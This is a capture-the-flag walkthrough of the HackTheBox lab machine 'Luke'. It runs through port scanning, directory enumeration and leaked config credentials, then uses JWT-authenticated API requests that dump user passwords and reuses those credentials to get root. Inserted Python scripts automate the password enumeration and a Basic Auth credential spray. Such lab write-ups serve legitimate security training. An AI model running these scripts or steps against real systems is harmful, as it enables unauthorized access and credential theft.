Taking down Luke on HackTheBox: a walkthrough
As usual, the first step is an Nmap scan of the host to identify the running services:
Nmap scan report for 10.10.10.137
Host is up (0.042s latency).
Not shown: 65464 closed ports, 66 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.13.75
| Logged in as ftp
| TYPE: ASCII
| No session upload bandwidth limit
| No session download bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp open ssh?
80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open http Ajenti http control panel
|_http-title: Ajenti
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/13%OT=21%CT=1%CU=33830%PV=Y%DS=2%DC=T%G=Y%TM=5D52853
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z%II=RI%TS=21)O
OS:PS(O1=M54DNW6ST11%O2=M54DNW6ST11%O3=M54DNW6NNT11%O4=M54DNW6ST11%O5=M54DN
OS:W6ST11%O6=M54DST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)E
OS:CN(R=Y%DF=Y%T=40%W=FFFF%O=M54DNW6SLL%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=FFFF%S=O%A=S+%F=AS%O=M54DNW6ST11%R
OS:D=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 40.68 ms 10.10.12.1
2 40.94 ms 10.10.10.137
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4814.02 seconds
From this output we can see a number of open ports. The first one I looked at was FTP, since it allows anonymous login.
root@kali:~/Documents/luke# ncftp 10.10.10.137
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.137...
vsFTPd 3.0.3+ (ext.1) ready...
Logging in...
Login successful.
Logged in to 10.10.10.137.
ncftp / > ls
webapp/
ncftp / > cd webapp/
Directory successfully changed.
ncftp /webapp > ls
for_Chihiro.txt
ncftp /webapp > cat for_Chihiro.txt
Dear Chihiro !!
As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of
the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies !
Derry
ncftp /webapp >
As you can see, a single file is hosted over FTP: a txt file addressed to Chihiro. That appeared to be everything available on FTP. Next I moved on to port 80 and browsed to 10.10.10.137 to see what was hosted there.
I was presented with a basic Bootstrap 4 page. Nothing was hidden in the source and there were no links leading off the page. I then ran dirb to look for other directories and files hosted on the server.
root@kali:~/Documents/luke# dirb http://10.10.10.137
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Aug 13 08:45:35 2019
URL_BASE: http://10.10.10.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.137/ ----
==> DIRECTORY: http://10.10.10.137/css/
+ http://10.10.10.137/index.html (CODE:200|SIZE:3138)
==> DIRECTORY: http://10.10.10.137/js/
+ http://10.10.10.137/LICENSE (CODE:200|SIZE:1093)
+ http://10.10.10.137/management (CODE:401|SIZE:381)
==> DIRECTORY: http://10.10.10.137/member/
==> DIRECTORY: http://10.10.10.137/vendor/
---- Entering directory: http://10.10.10.137/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.137/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.137/member/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.137/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Aug 13 09:02:59 2019
DOWNLOADED: 4612 - FOUND: 3
A collection of directories turned up. I also rescanned with DirBuster, which found /login.php and config.php; for some reason dirb had missed them.
Browsing to config.php returned the following:
$dbHost = 'localhost';
$dbUsername = 'root';
$dbPassword = 'Zk6heYCyv6ZE9Xcg';
$db = "login";
$conn = new mysqli($dbHost, $dbUsername, $dbPassword, $db) or die("Connect failed: %s\n". $conn -> error);
We now have a set of database credentials: root:Zk6heYCyv6ZE9Xcg. /management was the other notable find; browsing to it brings up an HTTP Basic Authentication prompt. For now there didn't appear to be anything else on port 80, so I moved on to port 3000.
Port 3000 appears to host a Node.js application. When you try to connect to it you get a JSON response:
{"success":false,"message":"Auth token is not supplied"}
I ran a directory brute force (DirBuster) against port 3000 to try to find anything else.
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Tue Aug 13 11:36:44 BST 2019
--------------------------------
http://10.10.10.137:3000
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/login/
/users/
/
/Login/
/users/admin/
/Users/
/Users/admin/
/users/Admin/
/Users/Admin/
/LogIn/
/LOGIN/
--------------------------------
--------------------------------
All of these paths return a JSON response very similar to the one from the root, indicating that you need to authenticate. After some investigation I found that the application uses JSON Web Tokens: you send a request containing a valid username and password to the login endpoint, the server responds with a token, and that token is then used to authenticate to the rest of the application. After a lot of trial and error, I was able to request a token with the following:
root@kali:/# curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg","rememberMe":false}' http://10.10.10.137:3000/login
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM"}root@kali:/#
As you can see, I used curl to send a POST request to http://10.10.10.137:3000/login containing the username and password found on port 80. The server responded with a token. I then used curl to send that token back to the application.
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000
{"message":"Welcome admin ! "}
root@kali:/#
Once sent, the server returns the message "Welcome admin !". I then sent the same token to the other paths DirBuster had found on port 3000.
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
root@kali:/#
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/admin
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}
You can see that /users responds with a list of users: Admin, Derry, Yuri and Dory. /users/admin responds with Admin's username and password: admin:WX5b7)>/rp$U)FW. I then sent the token to the endpoints for the other 3 users listed in /users.
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/derry
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/yuri
{"name":"Yuri","password":"bet@tester87"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/dory
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}
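The port-3000 flow above (POST credentials to /login, receive a JWT, replay it as a Bearer header against /users and /users/<name>) is easy to automate, and it is worth decoding the token once to see what it actually asserts. The following is an added example and not code from the original write-up. It assumes only what the write-up shows: the request and response shapes of /login, /users and /users/<name>, and the token string returned above. The HTTP status codes (200 on success, 401 when the token is missing) and the `fake_send` responder at the bottom are constructed so the logic runs offline; swap in `http_send` to run it against the box.

```python
"""Added example, not code from the original write-up: the port-3000 JWT flow,
automated.  Assumes only what the write-up shows (POST /login returns
{"success": true, "token": ...}; /users and /users/<name> take
"Authorization: Bearer <token>").  HTTP goes through an injectable `send`
callable so the logic also runs offline against canned responses."""
import base64
import json
import urllib.error
import urllib.request
from typing import Dict, Tuple

BASE = "http://10.10.10.137:3000"  # target from the write-up

# Token returned by /login in the write-up, copied verbatim.
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9."
         "pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM")


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url with '=' padding stripped; restore it first.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> Tuple[dict, dict]:
    """(header, claims) WITHOUT signature verification: the HS256 key is
    server-side, so this shows what the token asserts, not that it is genuine."""
    header, payload, _signature = token.split(".")
    return json.loads(_b64url_decode(header)), json.loads(_b64url_decode(payload))


def http_send(method, url, headers, body=None) -> Tuple[int, bytes]:
    """Real transport; 4xx/5xx come back as (status, body) instead of raising."""
    req = urllib.request.Request(url, data=body, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def login(send, username: str, password: str) -> str:
    """POST credentials to /login and return the bearer token."""
    body = json.dumps({"username": username, "password": password,
                       "rememberMe": False}).encode()
    status, raw = send("POST", BASE + "/login",
                       {"Accept": "application/json",
                        "Content-Type": "application/json"}, body)
    data = json.loads(raw)
    if status != 200 or not data.get("success"):
        raise RuntimeError(f"login failed ({status}): {data.get('message')}")
    return data["token"]


def enumerate_users(send, token: str) -> Dict[str, str]:
    """List /users, then fetch /users/<name> for each: name -> password.
    The weakness is the API handing every user's plaintext password to any
    token holder; the JWT itself is doing its job."""
    auth = {"Accept": "application/json", "Authorization": f"Bearer {token}"}
    status, raw = send("GET", BASE + "/users", auth, None)
    if status != 200:
        raise RuntimeError(f"/users returned {status}")
    found: Dict[str, str] = {}
    for entry in json.loads(raw):
        name = entry["name"].lower()  # the write-up uses lowercase path segments
        status, raw = send("GET", f"{BASE}/users/{name}", auth, None)
        if status == 200:
            found[name] = json.loads(raw)["password"]
    return found


# Constructed offline responder.  Bodies are the JSON shown in the write-up;
# the status codes (200/401/404) are assumed, the page does not show them.
_CANNED = {
    "/users": '[{"ID":"1","name":"Admin","Role":"Superuser"},'
              '{"ID":"2","name":"Derry","Role":"Web Admin"},'
              '{"ID":"3","name":"Yuri","Role":"Beta Tester"},'
              '{"ID":"4","name":"Dory","Role":"Supporter"}]',
    "/users/admin": '{"name":"Admin","password":"WX5b7)>/rp$U)FW"}',
    "/users/derry": '{"name":"Derry","password":"rZ86wwLvx7jUxtch"}',
    "/users/yuri": '{"name":"Yuri","password":"bet@tester87"}',
    "/users/dory": '{"name":"Dory","password":"5y:!xa=ybfe)/QD"}',
}


def fake_send(method, url, headers, body=None) -> Tuple[int, bytes]:
    path = url[len(BASE):]
    if method == "POST" and path == "/login":
        creds = json.loads(body or b"{}")
        if (creds.get("username"), creds.get("password")) == ("admin", "Zk6heYCyv6ZE9Xcg"):
            return 200, json.dumps({"success": True, "message": "Authentication successful!",
                                    "token": TOKEN}).encode()
        return 401, b'{"success":false,"message":"Authentication failed"}'  # constructed text
    if headers.get("Authorization") != f"Bearer {TOKEN}":
        return 401, b'{"success":false,"message":"Auth token is not supplied"}'
    return (200, _CANNED[path].encode()) if path in _CANNED else (404, b"{}")


if __name__ == "__main__":
    # Swap fake_send for http_send to run this against the real box.
    tok = login(fake_send, "admin", "Zk6heYCyv6ZE9Xcg")
    print(decode_jwt_unverified(tok)[1])
    for user, pw in enumerate_users(fake_send, tok).items():
        print(f"{user}:{pw}")
```

Decoding the page's token shows the claims `{"username":"admin","iat":1565779588,"exp":1565865988}`, i.e. a 24-hour lifetime, and the header `{"alg":"HS256","typ":"JWT"}`. Decoding is not verification: without the server's HMAC key nothing here can tell a forged token from a real one, and the point of the exercise is that a genuine token is enough, because the API returns other users' plaintext passwords to whoever holds one.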
So after all that, I have 5 sets of credentials:
- Dory:5y:!xa=ybfe)/QD
- Yuri:bet@tester87
- Derry:rZ86wwLvx7jUxtch
- Admin:WX5b7)>/rp$U)FW
- root:Zk6heYCyv6ZE9Xcg
I went back to /management on port 80 and tried each set of credentials in turn. The Derry user was able to log in. From here we get a directory listing with 3 files: config.json, config.php and login.php. I opened config.json, which showed the following:
From that JSON output we now have another root password. I then moved on to port 8000.
This is Ajenti, a web-based server administration panel. I tried logging in with each of the 6 sets of credentials captured in the previous steps. The root login from config.json got me into the panel.
From there a terminal session can be spawned in the web browser on the machine. With that terminal access I was able to grab both user.txt and root.txt and complete the box.
# cd /root
# ls
.cache .config .cshrc .history .k5login .login .mysql_history .node_repl_history .npm .profile .wget-hsts root.txt
# cat root.txt
[REDACTED]
# cd /home/derry
# ls
.cshrc .login .login_conf .mail_aliases .mailrc .profile .shrc user.txt
# cat user.txt
[REDACTED]
#
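The credential-reuse check against /management above was done by hand, one curl or browser prompt per pair. The following is an added example, not code from the original write-up, that does the same check in code: it builds the RFC 7617 `Authorization: Basic` header itself (two of the recovered passwords contain `)`, `$`, `/` and `:`, which is exactly where hand-quoting on a shell line goes wrong) and tries each pair in turn. It assumes only that Derry's pair is accepted, as the write-up reports; the write-up does not give the username's exact case, so lowercase is assumed. The `fake_send` responder is constructed for offline use; swap in `http_status` to run it against the box.

```python
"""Added example, not code from the original write-up: spray the recovered
credentials at the HTTP Basic Auth prompt on /management.  Assumes only what
the write-up states (Derry's pair works; username case assumed lowercase)."""
import base64
import urllib.error
import urllib.request
from typing import Dict, List, Tuple

URL = "http://10.10.10.137/management"  # Basic-Auth protected path from the dirb output

# The five pairs collected earlier in the write-up.
CREDS: List[Tuple[str, str]] = [
    ("dory", "5y:!xa=ybfe)/QD"),
    ("yuri", "bet@tester87"),
    ("derry", "rZ86wwLvx7jUxtch"),
    ("admin", "WX5b7)>/rp$U)FW"),
    ("root", "Zk6heYCyv6ZE9Xcg"),
]


def basic_auth_header(user: str, password: str) -> str:
    """RFC 7617 value: 'Basic ' + base64(user ':' password), UTF-8 encoded."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def decode_basic_header(value: str) -> Tuple[str, str]:
    """Inverse of basic_auth_header.  Split on the FIRST colon only: the user
    name may not contain one, but the password may (Dory's does)."""
    scheme, _, b64 = value.partition(" ")
    if scheme != "Basic":
        raise ValueError("not a Basic Authorization header")
    user, _, password = base64.b64decode(b64).decode().partition(":")
    return user, password


def http_status(url: str, headers: Dict[str, str]) -> int:
    """Real transport: GET the path and return the status code (401 = rejected)."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def spray(send, url: str, creds: List[Tuple[str, str]],
          stop_on_first: bool = True) -> List[Tuple[str, str]]:
    """Try each pair; 200 means accepted.  Five attempts is nothing, but on a
    real target keep an eye on lockout and rate limiting before looping."""
    hits: List[Tuple[str, str]] = []
    for user, password in creds:
        if send(url, {"Authorization": basic_auth_header(user, password)}) == 200:
            hits.append((user, password))
            if stop_on_first:
                break
    return hits


def fake_send(url: str, headers: Dict[str, str]) -> int:
    """Constructed responder: decodes the header independently and accepts
    only the pair the write-up reports as working."""
    try:
        user_pw = decode_basic_header(headers.get("Authorization", ""))
    except (ValueError, UnicodeDecodeError):
        return 401
    return 200 if user_pw == ("derry", "rZ86wwLvx7jUxtch") else 401


if __name__ == "__main__":
    # Replace fake_send with http_status to run against the real box.
    print(spray(fake_send, URL, CREDS))
```

The same list is what gets tried against Ajenti on port 8000 next; that login is a form rather than a Basic Auth prompt, so the header helper does not apply there, but the loop shape is the same.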
Follow: Hunter Cybersecurity (Hunter網路安全) for more information
Website: bbs.kylzrv.com
CTF team: Hunter Cybersecurity
Article: Xtrato
Layout: Hunter-匿名者